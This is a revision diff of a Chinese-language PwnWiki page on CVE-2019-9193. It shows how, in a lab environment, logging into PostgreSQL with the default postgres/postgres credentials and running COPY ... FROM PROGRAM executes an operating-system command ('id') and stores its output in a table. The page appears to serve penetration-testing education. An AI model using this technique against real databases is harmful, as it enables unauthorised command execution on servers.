Difference between revisions of "CVE-2019-9193 PostgreSQL 高權限命令執行漏洞"

From PwnWiki
(Created page with "<languages /> <translate> ==漏洞利用== </translate> <translate> 啟動漏洞環境後, 將開啟Postgres默認的5432端口,默認賬號密碼為postgres/postgres...")
 
(Marked this version for translation)
 
Line 2: Line 2:
  
 
<translate>
 
<translate>
==漏洞利用==
+
==漏洞利用== <!--T:1-->
 
</translate>
 
</translate>
  
 
<translate>
 
<translate>
 +
<!--T:2-->
 
啟動漏洞環境後, 將開啟Postgres默認的5432端口,默認賬號密碼為postgres/postgres, 連接到數據庫。
 
啟動漏洞環境後, 將開啟Postgres默認的5432端口,默認賬號密碼為postgres/postgres, 連接到數據庫。
 
</translate>
 
</translate>
Line 16: Line 17:
  
 
<translate>
 
<translate>
 +
<!--T:3-->
 
FROM PROGRAM語句將執行命令id並將結果保存在cmd_exec表中。
 
FROM PROGRAM語句將執行命令id並將結果保存在cmd_exec表中。
 
</translate>
 
</translate>

Latest revision as of 19:43, 7 April 2021

Other languages:
Chinese

漏洞利用

啟動漏洞環境後, 將開啟Postgres默認的5432端口,默認賬號密碼為postgres/postgres, 連接到數據庫。

DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;

FROM PROGRAM語句將執行命令id並將結果保存在cmd_exec表中。